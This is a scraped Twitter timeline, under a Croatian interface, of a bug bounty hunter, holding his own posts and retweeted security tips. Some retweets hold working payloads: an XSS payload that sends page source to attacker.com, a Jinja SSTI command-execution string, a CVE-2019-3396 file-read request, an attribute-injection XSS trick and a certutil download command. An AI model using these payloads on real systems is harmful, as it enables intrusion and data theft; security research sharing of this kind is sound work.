Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @kongwenbin
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @kongwenbin
-
Prikvačeni tweet
I posted a review of my bug hunting journey so far, from when I just started, to the point where I made it into the Top 200 bug hunters on
#Bugcrowd recently, after two years on the platform: URL: https://kongwenbin.com/a-review-of-my-bug-hunting-journey/ … Happy New Year!#bugbounty#OuthackThemAll#ItTakesACrowdHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Everyone is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
XSS isn't about alert(1). The payload below steals source code of the current webpage without triggering browser restrictions <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s
#bugbountytips#bugbounty#bugbountytipHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
Want more training apps? We hear you! We just released the MSTG-Android-Java & MSTG-Android-Kotlin for Android and the MSTG-JWT app for iOS. Come and check it out at https://github.com/OWASP/MSTG-Hacking-Playground/releases … ! With special thanks to
@bsd_daemon,@kongwenbin,@nikhil, and@ryantzj!Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Many people in Singapore has received this message via sms : ``` Your courier has been sent out. Please check and accept it.https://bit.ly/2kJAjs9 ``` Hopefully people don't fall for it. It would even download a fake DHL APK file when you open the url
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
This is brilliant! I could only last 30 seconds. I think it can make most people piss off though, not just designers.https://twitter.com/nickf/status/1146525816869646336 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Keep trying...
somehow this was classified as an important email by Outlook and hence managed to get into the "Focused" section of my email inbox.pic.twitter.com/moKBps8ZPx
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
Cobalt Strike. Walkthrough for Red Teamers https://www.reddit.com/r/redteamsec/comments/bdh7vx/cobalt_strike_walkthrough_for_red_teamers/ …
#redteamsecHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
I added about 300k more dirs/files to
@Jhaddix's content_discovery_all.txt. Enjoy! https://gist.github.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7#file-content_discovery_nullenc0de-txt …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
CVE-2019-3396 POC (h/t to
@0xc0ffee_) POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: http://wiki.example.com {"contentId":"1245","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=REPLACEMEH ……","width":"300","height":"200","_template":"file:///"}}}Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
Common ways to get RCE: - SSRF to Metadata - Jenkins /script - Jenkins Orange RCE - Leaked cloud creds/keys (online, via LFD, ect) - Arbitrary file upload - ImageTragik - SSTI Fill in how you've gotten RCE!
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
Remember, hunting on bug bounty programs isn’t a walk in, get cash, easy task. in most cases it’s some of the most hardened targets that you’re ever going to go up against. That requires a lot of thinking outside the box, coz the bugs&$ are there, but you will have to work for it
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
H1-65 was a huge blast! Honoured to meet some of the most amazing and talented bug hunters from around the world! Finally managed to map some of the Twitter handles to faces in real life
Thanks @Hacker0x01 &@Dropbox for making this happen!#TogetherWeHitHarder#h165pic.twitter.com/RvYAK2ZLZU
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
#infosec#bugbounty#bugbountytip#bugbountytips Wow, this is a great#SSTI payload for sites using Flask/Jinja: {{config.items()[4][1].__class__.__mro__[2].__subclasses__()[229]([\"touch /tmp/test\"], shell=True) }} Simple pythonic#RCE! Easiest Server-Side Template Injection.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Totally looking forward to meeting the super talented folks from all over the world tomorrow at
#h165
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
Only recently learned that you can use certutil to download files. certutil -urlcache -split -f http://file.txt c:\somewhere\file.txt Thanks
@_RythmStick for the tip.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Great thread on recon, thanks
@stokfredrik for getting this started. Looking forward to the video!https://twitter.com/stokfredrik/status/1109733020540567555 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
This is so important, everyone in
#infosec should read this.#BugBounty#BugBountyTip - read this too!https://twitter.com/enigma0x3/status/1081219028578902016 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
Maybe it’s not obvious, so I’ll repeat it. Hackers and the
#infosec community in general are here to help people and companies to fix their security issues. We are the nice guys in this story, we are helping people in the good way.Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WenBin Kong proslijedio/la je Tweet
#bugbounty#bugbountytip#bugbountytips Sometimes user input is reflected into a value without any quotations. Eg:<input value={input}> Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().#infosec#cybersecurityHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.